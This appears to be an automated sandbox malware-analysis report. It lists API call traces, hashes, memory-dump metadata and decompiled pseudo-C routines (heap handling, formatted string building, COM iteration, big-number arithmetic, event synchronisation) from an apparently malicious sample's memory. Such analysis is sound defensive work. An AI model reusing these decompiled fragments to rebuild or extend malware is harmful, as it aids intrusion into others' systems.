                                                                                                            • Instruction Fuzzy Hash: 94118FB1904745BFE720CBE5D940F12F7ECAB06614F04861AF244CB680D7B4F9608BA5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 6F09CEFD
                                                                                                              • Part of subcall function 6F091434: HeapFree.KERNEL32(00000000,00000000,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?), ref: 6F09144A
                                                                                                              • Part of subcall function 6F091434: GetLastError.KERNEL32(?,?,6F09D1C0,?,00000000,?,?,?,6F09D4C4,?,00000007,?,?,6F09B43B,?,?), ref: 6F09145C
                                                                                                            • _free.LIBCMT ref: 6F09CF0F
                                                                                                            • _free.LIBCMT ref: 6F09CF21
                                                                                                            • _free.LIBCMT ref: 6F09CF33
                                                                                                            • _free.LIBCMT ref: 6F09CF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: 7785394202896f354cb6fdaaf58be89608731bf3d8d3e4f526a95999c8a6bf26
                                                                                                            • Instruction ID: 645f28c00cbc64f63cdc759d2ff3026ed925e175ad1e5e83973181500c503f6c
                                                                                                            • Opcode Fuzzy Hash: 7785394202896f354cb6fdaaf58be89608731bf3d8d3e4f526a95999c8a6bf26
                                                                                                            • Instruction Fuzzy Hash: 90F09631B09B05978F01CF58E194FD737DDAA097247A8A806F428D7582E730F880AAD0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Smanip$task
                                                                                                            • String ID: .
                                                                                                            • API String ID: 1925983085-248832578
                                                                                                            • Opcode ID: 4b41ea781811e630ff1d789c88b697b356592b52aff7bf56500c5108ecfed2f5
                                                                                                            • Instruction ID: b8c5378a4252ac098d3b0ab02ad0449f8b77eccccc9051a64f554afcca11e8ce
                                                                                                            • Opcode Fuzzy Hash: 4b41ea781811e630ff1d789c88b697b356592b52aff7bf56500c5108ecfed2f5
                                                                                                            • Instruction Fuzzy Hash: 4D816571D00615DFCB08CFA8CE90BEDBBB5FB46314F208169D90697292E7386A58EF54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 56%
                                                                                                            			E0303577D(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                            				void* _v8;
                                                                                                            				void* __edi;
                                                                                                            				intOrPtr _t18;
                                                                                                            				void* _t24;
                                                                                                            				void* _t30;
                                                                                                            				void* _t36;
                                                                                                            				void* _t40;
                                                                                                            				intOrPtr _t42;
                                                                                                            
                                                                                                            				_t36 = __edx;
                                                                                                            				_t32 = __ecx;
                                                                                                            				_push(__ecx);
                                                                                                            				_push(__ecx);
                                                                                                            				_t42 =  *0x303d380; // 0x5319b28
                                                                                                            				_push(0x800);
                                                                                                            				_push(0);
                                                                                                            				_push( *0x303d270);
                                                                                                            				if( *0x303d284 >= 5) {
                                                                                                            					if(RtlAllocateHeap() == 0) {
                                                                                                            						L6:
                                                                                                            						_t30 = 8;
                                                                                                            						L7:
                                                                                                            						if(_t30 != 0) {
                                                                                                            							L10:
                                                                                                            							 *0x303d284 =  *0x303d284 + 1;
                                                                                                            							L11:
                                                                                                            							return _t30;
                                                                                                            						}
                                                                                                            						_t44 = _a4;
                                                                                                            						_t40 = _v8;
                                                                                                            						 *_a16 = _a4;
                                                                                                            						 *_a20 = E0303789B(_t44, _t40);
                                                                                                            						_t18 = E03033720(_t40, _t44);
                                                                                                            						if(_t18 != 0) {
                                                                                                            							 *_a8 = _t40;
                                                                                                            							 *_a12 = _t18;
                                                                                                            							if( *0x303d284 < 5) {
                                                                                                            								 *0x303d284 =  *0x303d284 & 0x00000000;
                                                                                                            							}
                                                                                                            							goto L11;
                                                                                                            						}
                                                                                                            						_t30 = 0xbf;
                                                                                                            						E030347D5();
                                                                                                            						HeapFree( *0x303d270, 0, _t40);
                                                                                                            						goto L10;
                                                                                                            					}
                                                                                                            					_t24 = E030344A4(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
                                                                                                            					L5:
                                                                                                            					_t30 = _t24;
                                                                                                            					goto L7;
                                                                                                            				}
                                                                                                            				if(RtlAllocateHeap() == 0) {
                                                                                                            					goto L6;
                                                                                                            				}
                                                                                                            				_t24 = E03036109(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
                                                                                                            				goto L5;
                                                                                                            			}












                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 030357A1
                                                                                                              • Part of subcall function 03036109: GetTickCount.KERNEL32 ref: 0303611D
                                                                                                              • Part of subcall function 03036109: wsprintfA.USER32 ref: 0303616D
                                                                                                              • Part of subcall function 03036109: wsprintfA.USER32 ref: 0303618A
                                                                                                              • Part of subcall function 03036109: wsprintfA.USER32 ref: 030361B6
                                                                                                              • Part of subcall function 03036109: HeapFree.KERNEL32(00000000,?), ref: 030361C8
                                                                                                              • Part of subcall function 03036109: wsprintfA.USER32 ref: 030361E9
                                                                                                              • Part of subcall function 03036109: HeapFree.KERNEL32(00000000,?), ref: 030361F9
                                                                                                              • Part of subcall function 03036109: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03036227
                                                                                                              • Part of subcall function 03036109: GetTickCount.KERNEL32 ref: 03036238
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000800,747DF710), ref: 030357BF
                                                                                                            • HeapFree.KERNEL32(00000000,00000002,0303553A,?,0303553A,00000002,?,?,030353C9,?), ref: 0303581C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                                                                            • String ID: Uxt
                                                                                                            • API String ID: 1676223858-1536154274
                                                                                                            • Opcode ID: 5e76c50d82a8c811b013dd1ecc40c0d22b7cda3fc381d5d42ff364a4aef074cd
                                                                                                            • Instruction ID: b9a843ac777e32e6172c6b09a5223c0b3b0e1d38699fd27c36d41bbcd7180163
                                                                                                            • Opcode Fuzzy Hash: 5e76c50d82a8c811b013dd1ecc40c0d22b7cda3fc381d5d42ff364a4aef074cd
                                                                                                            • Instruction Fuzzy Hash: 63214C76202209EBDB51EF68DC84EDB37BCEB4A740F140466F902EB250DB74D905DBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 6F05DF6D
                                                                                                              • Part of subcall function 6F0567FA: _Maklocstr.LIBCPMT ref: 6F05681A
                                                                                                              • Part of subcall function 6F0567FA: _Maklocstr.LIBCPMT ref: 6F056837
                                                                                                              • Part of subcall function 6F0567FA: _Maklocstr.LIBCPMT ref: 6F056854
                                                                                                              • Part of subcall function 6F0567FA: _Maklocchr.LIBCPMT ref: 6F056866
                                                                                                              • Part of subcall function 6F0567FA: _Maklocchr.LIBCPMT ref: 6F056879
                                                                                                            • _Mpunct.LIBCPMT ref: 6F05DFFA
                                                                                                            • _Mpunct.LIBCPMT ref: 6F05E014
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                            • String ID: $+xv
                                                                                                            • API String ID: 2939335142-1686923651
                                                                                                            • Opcode ID: fa5eda1acda0eb454e782883385d3013d439e0da0f2c913806614e0270660b03
                                                                                                            • Instruction ID: 8ca5c308709437c06f76671e914b5d89b186fa76813ba50b197285019482c5bc
                                                                                                            • Opcode Fuzzy Hash: fa5eda1acda0eb454e782883385d3013d439e0da0f2c913806614e0270660b03
                                                                                                            • Instruction Fuzzy Hash: 152190B1904B56AEDB21DF74C990B7BBEF8AB0D204F140A1AE499C7A81D774E611CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: Mpunct$H_prolog3
                                                                                                            • String ID: $+xv
                                                                                                            • API String ID: 4281374311-1686923651
                                                                                                            • Opcode ID: 865f8aad70552428da9ae0f4d1a9d421807648b658977dd57db98c1f88f24f9f
                                                                                                            • Instruction ID: 0ebb90cd6f6833f080f0979ab76f45294f4409871a830e26fcc210b76730eb51
                                                                                                            • Opcode Fuzzy Hash: 865f8aad70552428da9ae0f4d1a9d421807648b658977dd57db98c1f88f24f9f
                                                                                                            • Instruction Fuzzy Hash: 5E2192B1904B56AED721CF74889077BBEF8AB0D304F140A1AE459CBA81D774E651CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 46%
                                                                                                            			E03035920(intOrPtr* __eax) {
                                                                                                            				void* _v8;
                                                                                                            				WCHAR* _v12;
                                                                                                            				void* _v16;
                                                                                                            				char _v20;
                                                                                                            				void* _v24;
                                                                                                            				intOrPtr _v28;
                                                                                                            				void* _v32;
                                                                                                            				intOrPtr _v40;
                                                                                                            				short _v48;
                                                                                                            				intOrPtr _v56;
                                                                                                            				short _v64;
                                                                                                            				intOrPtr* _t54;
                                                                                                            				intOrPtr* _t56;
                                                                                                            				intOrPtr _t57;
                                                                                                            				intOrPtr* _t58;
                                                                                                            				intOrPtr* _t60;
                                                                                                            				void* _t61;
                                                                                                            				intOrPtr* _t63;
                                                                                                            				intOrPtr* _t65;
                                                                                                            				short _t67;
                                                                                                            				intOrPtr* _t68;
                                                                                                            				intOrPtr* _t70;
                                                                                                            				intOrPtr* _t72;
                                                                                                            				intOrPtr* _t75;
                                                                                                            				intOrPtr* _t77;
                                                                                                            				intOrPtr _t79;
                                                                                                            				intOrPtr* _t83;
                                                                                                            				intOrPtr* _t87;
                                                                                                            				intOrPtr _t103;
                                                                                                            				intOrPtr _t109;
                                                                                                            				void* _t118;
                                                                                                            				void* _t122;
                                                                                                            				void* _t123;
                                                                                                            				intOrPtr _t130;
                                                                                                            
                                                                                                            				_t123 = _t122 - 0x3c;
                                                                                                            				_push( &_v8);
                                                                                                            				_push(__eax);
                                                                                                            				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                                                                                            				if(_t118 >= 0) {
                                                                                                            					_t54 = _v8;
                                                                                                            					_t103 =  *0x303d2e0; // 0x22da5a8
                                                                                                            					_t5 = _t103 + 0x303e038; // 0x3050f485
                                                                                                            					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                                                                            					_t56 = _v8;
                                                                                                            					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                                                                            					if(_t118 >= 0) {
                                                                                                            						__imp__#2(0x303c2b0);
                                                                                                            						_v28 = _t57;
                                                                                                            						if(_t57 == 0) {
                                                                                                            							_t118 = 0x8007000e;
                                                                                                            						} else {
                                                                                                            							_t60 = _v32;
                                                                                                            							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                                                                            							_t87 = __imp__#6;
                                                                                                            							_t118 = _t61;
                                                                                                            							if(_t118 >= 0) {
                                                                                                            								_t63 = _v24;
                                                                                                            								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                                                                            								if(_t118 >= 0) {
                                                                                                            									_t130 = _v20;
                                                                                                            									if(_t130 != 0) {
                                                                                                            										_t67 = 3;
                                                                                                            										_v64 = _t67;
                                                                                                            										_v48 = _t67;
                                                                                                            										_v56 = 0;
                                                                                                            										_v40 = 0;
                                                                                                            										if(_t130 > 0) {
                                                                                                            											while(1) {
                                                                                                            												_t68 = _v24;
                                                                                                            												asm("movsd");
                                                                                                            												asm("movsd");
                                                                                                            												asm("movsd");
                                                                                                            												asm("movsd");
                                                                                                            												_t123 = _t123;
                                                                                                            												asm("movsd");
                                                                                                            												asm("movsd");
                                                                                                            												asm("movsd");
                                                                                                            												asm("movsd");
                                                                                                            												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                                                                                            												if(_t118 < 0) {
                                                                                                            													goto L16;
                                                                                                            												}
                                                                                                            												_t70 = _v8;
                                                                                                            												_t109 =  *0x303d2e0; // 0x22da5a8
                                                                                                            												_t28 = _t109 + 0x303e0bc; // 0x3050f1ff
                                                                                                            												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                                                                                            												if(_t118 >= 0) {
                                                                                                            													_t75 = _v16;
                                                                                                            													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                                                                                            													if(_t118 >= 0 && _v12 != 0) {
                                                                                                            														_t79 =  *0x303d2e0; // 0x22da5a8
                                                                                                            														_t33 = _t79 + 0x303e078; // 0x76006f
                                                                                                            														if(lstrcmpW(_v12, _t33) == 0) {
                                                                                                            															_t83 = _v16;
                                                                                                            															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                                                                                            														}
                                                                                                            														 *_t87(_v12);
                                                                                                            													}
                                                                                                            													_t77 = _v16;
                                                                                                            													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                                                                                            												}
                                                                                                            												_t72 = _v8;
                                                                                                            												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                                                            												_v40 = _v40 + 1;
                                                                                                            												if(_v40 < _v20) {
                                                                                                            													continue;
                                                                                                            												}
                                                                                                            												goto L16;
                                                                                                            											}
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            								L16:
                                                                                                            								_t65 = _v24;
                                                                                                            								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                                                                            							}
                                                                                                            							 *_t87(_v28);
                                                                                                            						}
                                                                                                            						_t58 = _v32;
                                                                                                            						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t118;
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • SysAllocString.OLEAUT32(0303C2B0), ref: 03035970
                                                                                                            • lstrcmpW.KERNEL32(00000000,0076006F), ref: 03035A51
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 03035A6A
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 03035A99
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: String$Free$Alloclstrcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 1885612795-0
                                                                                                            • Opcode ID: 12324dfd1badae32da4172b9899ef2375710be32e665598f2983582a3e67d386
                                                                                                            • Instruction ID: 9f9e3e48224b5ec6ce241645f3b9a06320beb9cea71fb0e2eb94798b297c3888
                                                                                                            • Opcode Fuzzy Hash: 12324dfd1badae32da4172b9899ef2375710be32e665598f2983582a3e67d386
                                                                                                            • Instruction Fuzzy Hash: 73513E76D01519EFCB00DFA8C8889EEF7B9FF8A704B148595E915EB224D731AD41CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • SysAllocString.OLEAUT32(?), ref: 030332AE
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 03033393
                                                                                                              • Part of subcall function 03035920: SysAllocString.OLEAUT32(0303C2B0), ref: 03035970
                                                                                                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 030333E6
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 030333F5
                                                                                                              • Part of subcall function 03033D39: Sleep.KERNEL32(000001F4), ref: 03033D81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 3193056040-0
                                                                                                            • Opcode ID: 2ef8665f37597ffb60d92d61f3d7e288db19f0c2a015f4667e23d3c482fc100a
                                                                                                            • Instruction ID: bd03eb85b2326e06eeb671cf1d7cbbffced9fa09fa8ac3e801aae3ba8a893111
                                                                                                            • Opcode Fuzzy Hash: 2ef8665f37597ffb60d92d61f3d7e288db19f0c2a015f4667e23d3c482fc100a
                                                                                                            • Instruction Fuzzy Hash: BC51403A601609EFDB01DFA8C884ADEB7B9FF89700B188969E505DB210DB75ED06CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 85%
                                                                                                            			E03037B30(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				intOrPtr _v12;
                                                                                                            				signed int _v16;
                                                                                                            				void _v156;
                                                                                                            				void _v428;
                                                                                                            				void* _t55;
                                                                                                            				unsigned int _t56;
                                                                                                            				signed int _t66;
                                                                                                            				signed int _t74;
                                                                                                            				void* _t76;
                                                                                                            				signed int _t79;
                                                                                                            				void* _t81;
                                                                                                            				void* _t92;
                                                                                                            				void* _t96;
                                                                                                            				signed int* _t99;
                                                                                                            				signed int _t101;
                                                                                                            				signed int _t103;
                                                                                                            				void* _t107;
                                                                                                            
                                                                                                            				_t92 = _a12;
                                                                                                            				_t101 = __eax;
                                                                                                            				_t55 = E030347C4(_a16, _t92);
                                                                                                            				_t79 = _t55;
                                                                                                            				if(_t79 == 0) {
                                                                                                            					L18:
                                                                                                            					return _t55;
                                                                                                            				}
                                                                                                            				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                                                                            				_t81 = 0;
                                                                                                            				_t96 = 0x20;
                                                                                                            				if(_t56 == 0) {
                                                                                                            					L4:
                                                                                                            					_t97 = _t96 - _t81;
                                                                                                            					_v12 = _t96 - _t81;
                                                                                                            					E0303227C(_t79,  &_v428);
                                                                                                            					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E03033C06(_t101,  &_v428, _a8, _t96 - _t81);
                                                                                                            					E03033C06(_t79,  &_v156, _a12, _t97);
                                                                                                            					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                                                                                            					_t66 = E0303227C(_t101, 0x303d168);
                                                                                                            					_t103 = _t101 - _t79;
                                                                                                            					_a8 = _t103;
                                                                                                            					if(_t103 < 0) {
                                                                                                            						L17:
                                                                                                            						E0303227C(_a16, _a4);
                                                                                                            						E03033450(_t79,  &_v428, _a4, _t97);
                                                                                                            						memset( &_v428, 0, 0x10c);
                                                                                                            						_t55 = memset( &_v156, 0, 0x84);
                                                                                                            						goto L18;
                                                                                                            					}
                                                                                                            					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                                                                                            					do {
                                                                                                            						if(_v8 != 0xffffffff) {
                                                                                                            							_push(1);
                                                                                                            							_push(0);
                                                                                                            							_push(0);
                                                                                                            							_push( *_t99);
                                                                                                            							L0303AED0();
                                                                                                            							_t74 = _t66 +  *(_t99 - 4);
                                                                                                            							asm("adc edx, esi");
                                                                                                            							_push(0);
                                                                                                            							_push(_v8 + 1);
                                                                                                            							_push(_t92);
                                                                                                            							_push(_t74);
                                                                                                            							L0303AECA();
                                                                                                            							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                                                                            								_t74 = _t74 | 0xffffffff;
                                                                                                            								_v16 = _v16 & 0x00000000;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							_t74 =  *_t99;
                                                                                                            						}
                                                                                                            						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                                                                                            						_a12 = _t74;
                                                                                                            						_t76 = E03032420(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                                                                                            						while(1) {
                                                                                                            							 *_t99 =  *_t99 - _t76;
                                                                                                            							if( *_t99 != 0) {
                                                                                                            								goto L14;
                                                                                                            							}
                                                                                                            							L13:
                                                                                                            							_t92 =  &_v156;
                                                                                                            							if(E03033F60(_t79, _t92, _t106) < 0) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							L14:
                                                                                                            							_a12 = _a12 + 1;
                                                                                                            							_t76 = E03032775(_t79,  &_v156, _t106, _t106);
                                                                                                            							 *_t99 =  *_t99 - _t76;
                                                                                                            							if( *_t99 != 0) {
                                                                                                            								goto L14;
                                                                                                            							}
                                                                                                            							goto L13;
                                                                                                            						}
                                                                                                            						_a8 = _a8 - 1;
                                                                                                            						_t66 = _a12;
                                                                                                            						_t99 = _t99 - 4;
                                                                                                            						 *(0x303d168 + _a8 * 4) = _t66;
                                                                                                            					} while (_a8 >= 0);
                                                                                                            					_t97 = _v12;
                                                                                                            					goto L17;
                                                                                                            				}
                                                                                                            				while(_t81 < _t96) {
                                                                                                            					_t81 = _t81 + 1;
                                                                                                            					_t56 = _t56 >> 1;
                                                                                                            					if(_t56 != 0) {
                                                                                                            						continue;
                                                                                                            					}
                                                                                                            					goto L4;
                                                                                                            				}
                                                                                                            				goto L4;
                                                                                                            			}






















                                                                                                            APIs
                                                                                                            • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 03037BE3
                                                                                                            • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 03037BF9
                                                                                                            • memset.NTDLL ref: 03037CA2
                                                                                                            • memset.NTDLL ref: 03037CB8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: memset$_allmul_aulldiv
                                                                                                            • String ID:
                                                                                                            • API String ID: 3041852380-0
                                                                                                            • Opcode ID: 65ba1a82ca474a9109edfd15e2b809026c5decb3c55a43cd10f1584cdef517e8
                                                                                                            • Instruction ID: dac86faedf1bbe35f5d8679473bbc70ff8a16c23ba3da9561fa7120fe9a31767
                                                                                                            • Opcode Fuzzy Hash: 65ba1a82ca474a9109edfd15e2b809026c5decb3c55a43cd10f1584cdef517e8
                                                                                                            • Instruction Fuzzy Hash: 18419375A02219AFDF10DF68CC80BDE77BDEF86710F104569F9099B280DB709A448B90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 87%
                                                                                                            			E03037CC7(signed int _a4, signed int* _a8) {
                                                                                                            				void* __ecx;
                                                                                                            				void* __edi;
                                                                                                            				signed int _t6;
                                                                                                            				intOrPtr _t8;
                                                                                                            				intOrPtr _t12;
                                                                                                            				short* _t19;
                                                                                                            				void* _t25;
                                                                                                            				signed int* _t28;
                                                                                                            				CHAR* _t30;
                                                                                                            				long _t31;
                                                                                                            				intOrPtr* _t32;
                                                                                                            
                                                                                                            				_t6 =  *0x303d2a8; // 0xd448b889
                                                                                                            				_t32 = _a4;
                                                                                                            				_a4 = _t6 ^ 0x109a6410;
                                                                                                            				_t8 =  *0x303d2e0; // 0x22da5a8
                                                                                                            				_t3 = _t8 + 0x303e876; // 0x61636f4c
                                                                                                            				_t25 = 0;
                                                                                                            				_t30 = E03033CC2(_t3, 1);
                                                                                                            				if(_t30 != 0) {
                                                                                                            					_t25 = CreateEventA(0x303d2e4, 1, 0, _t30);
                                                                                                            					E03034AAB(_t30);
                                                                                                            				}
                                                                                                            				_t12 =  *0x303d294; // 0x4000000a
                                                                                                            				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E03034A03() != 0) {
                                                                                                            					L12:
                                                                                                            					_t28 = _a8;
                                                                                                            					if(_t28 != 0) {
                                                                                                            						 *_t28 =  *_t28 | 0x00000001;
                                                                                                            					}
                                                                                                            					_t31 = E03031000(_t32, 0);
                                                                                                            					if(_t31 == 0 && _t25 != 0) {
                                                                                                            						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                            					}
                                                                                                            					if(_t28 != 0 && _t31 != 0) {
                                                                                                            						 *_t28 =  *_t28 & 0xfffffffe;
                                                                                                            					}
                                                                                                            					goto L20;
                                                                                                            				} else {
                                                                                                            					_t19 =  *0x303d108( *_t32, 0x20);
                                                                                                            					if(_t19 != 0) {
                                                                                                            						 *_t19 = 0;
                                                                                                            						_t19 = _t19 + 2;
                                                                                                            					}
                                                                                                            					_t31 = E03035AB2(0,  *_t32, _t19, 0);
                                                                                                            					if(_t31 == 0) {
                                                                                                            						if(_t25 == 0) {
                                                                                                            							L22:
                                                                                                            							return _t31;
                                                                                                            						}
                                                                                                            						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                                                                            						if(_t31 == 0) {
                                                                                                            							L20:
                                                                                                            							if(_t25 != 0) {
                                                                                                            								CloseHandle(_t25);
                                                                                                            							}
                                                                                                            							goto L22;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					goto L12;
                                                                                                            				}
                                                                                                            			}















                                                                                                            APIs
                                                                                                              • Part of subcall function 03033CC2: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05319B38,00000000,?,?,69B25F44,00000005,0303D00C,?,?,0303539B), ref: 03033CF8
                                                                                                              • Part of subcall function 03033CC2: lstrcpy.KERNEL32(00000000,00000000), ref: 03033D1C
                                                                                                              • Part of subcall function 03033CC2: lstrcat.KERNEL32(00000000,00000000), ref: 03033D24
                                                                                                            • CreateEventA.KERNEL32(0303D2E4,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,030321B6,?,00000001,?), ref: 03037D08
                                                                                                              • Part of subcall function 03034AAB: RtlFreeHeap.NTDLL(00000000,00000000,03035012,00000000,?,?,00000000), ref: 03034AB7
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00004E20,030321B6,00000000,00000000,?,00000000,?,030321B6,?,00000001,?,?,?,?,0303555B), ref: 03037D68
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,030321B6,?,00000001,?), ref: 03037D96
                                                                                                            • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,030321B6,?,00000001,?,?,?,?,0303555B), ref: 03037DAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.751417390.0000000003031000.00000020.00020000.sdmp, Offset: 03030000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.751377465.0000000003030000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751473328.000000000303C000.00000002.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751508317.000000000303D000.00000004.00020000.sdmp
                                                                                                            • Associated: 00000003.00000002.751528470.000000000303F000.00000002.00020000.sdmp
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 73268831-0
                                                                                                            • Opcode ID: c0f539caec4c2899ee51cf950f3c510f4c2cad1948f88087c28d6cad301992b0
                                                                                                            • Instruction ID: 663bd90b79d21860d9f82e2588d5c4d805a07a6e05675a39810721cb31f0188b
                                                                                                            • Opcode Fuzzy Hash: c0f539caec4c2899ee51cf950f3c510f4c2cad1948f88087c28d6cad301992b0
                                                                                                            • Instruction Fuzzy Hash: DE2128726037415BD7B1EE698C84ABBB3FDFF8AE10B090755F945EB104DB64C8018650
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.753041600.000000006F040000.00000020.00020000.sdmp, Offset: 6F040000, based on PE: false
                                                                                                            Similarity
                                                                                                            • API ID: task
                                                                                                            • String ID:
